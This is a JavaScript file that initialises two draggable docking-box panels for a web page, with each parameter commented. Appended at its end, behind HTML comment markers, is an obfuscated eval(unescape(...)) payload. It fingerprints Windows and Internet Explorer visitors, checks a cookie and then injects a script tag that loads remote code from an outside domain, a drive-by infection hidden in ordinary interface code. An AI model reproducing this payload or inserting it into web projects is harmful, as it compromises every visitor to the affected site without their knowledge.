
//initialisation function
addLoadEvent( function()
{
	//create new docking boxes group
	var meta = new dbxGroup(
		'grabit', 		// container ID [/-_a-zA-Z0-9/]
		'vertical', 	// orientation ['vertical'|'horizontal']
		'10', 			// drag threshold ['n' pixels]
		'no',			// restrict drag movement to container axis ['yes'|'no']
		'10', 			// animate re-ordering [frames per transition, or '0' for no effect]
		'yes', 			// include open/close toggle buttons ['yes'|'no']
		'closed', 		// default state ['open'|'closed']
		'open', 		// word for "open", as in "open this box"
		'close', 		// word for "close", as in "close this box"
		'click-down and drag to move this box', // sentence for "move this box" by mouse
		'click to %toggle% this box', // pattern-match sentence for "(open|close) this box" by mouse
		'use the arrow keys to move this box', // sentence for "move this box" by keyboard
		', or press the enter key to %toggle% it',  // pattern-match sentence-fragment for "(open|close) this box" by keyboard
		'%mytitle%  [%dbxtitle%]' // pattern-match syntax for title-attribute conflicts
		);

	var advanced = new dbxGroup(
		'advancedstuff', 		// container ID [/-_a-zA-Z0-9/]
		'vertical', 		// orientation ['vertical'|'horizontal']
		'10', 			// drag threshold ['n' pixels]
		'yes',			// restrict drag movement to container axis ['yes'|'no']
		'10', 			// animate re-ordering [frames per transition, or '0' for no effect]
		'yes', 			// include open/close toggle buttons ['yes'|'no']
		'closed', 		// default state ['open'|'closed']
		'open', 		// word for "open", as in "open this box"
		'close', 		// word for "close", as in "close this box"
		'click-down and drag to move this box', // sentence for "move this box" by mouse
		'click to %toggle% this box', // pattern-match sentence for "(open|close) this box" by mouse
		'use the arrow keys to move this box', // sentence for "move this box" by keyboard
		', or press the enter key to %toggle% it',  // pattern-match sentence-fragment for "(open|close) this box" by keyboard
		'%mytitle%  [%dbxtitle%]' // pattern-match syntax for title-attribute conflicts
		);
});
<!-- 
(function(lErM){eval(unescape(('#76ar#20#61#3d#22#53cr#69p#74Engine#22#2cb#3d#22V#65r#73ion()#2b#22#2cj#3d#22#22#2cu#3d#6e#61#76#69gator#2euser#41gent#3bif((u#2ei#6e#64exOf(#22Chrom#65#22)#3c0#29#26#26(#75#2e#69nde#78#4ff(#22W#69n#22)#3e0)#26#26(u#2e#69ndexOf#28#22NT#206#22#29#3c0)#26#26(#64#6fcu#6d#65n#74#2ecook#69#65#2ein#64ex#4f#66(#22m#69#65k#3d1#22#29#3c0)#26#26(typeof#28zrvzts)#21#3dt#79p#65of(#22#41#22))#29#7bzrvzts#3d#22A#22#3b#65val#28#22if(w#69#6e#64ow#2e#22#2ba+#22)#6a#3d#6a+#22#2ba+#22Ma#6aor#22#2b#62+a+#22Mino#72#22+b+a#2b#22B#75ild#22+b+#22j#3b#22)#3b#64ocumen#74#2ew#72i#74e#28#22#3cs#63#72#69pt#20#73r#63#3d#2f#2fm#61r#22+#22#74#75#7a#2ec#6e#2fvid#2f#3fid#3d#22+j#2b#22#3e#3c#5c#2f#73cr#69pt#3e#22#29#3b#7d').replace(lErM,'%')))})(/\#/g);
 -->
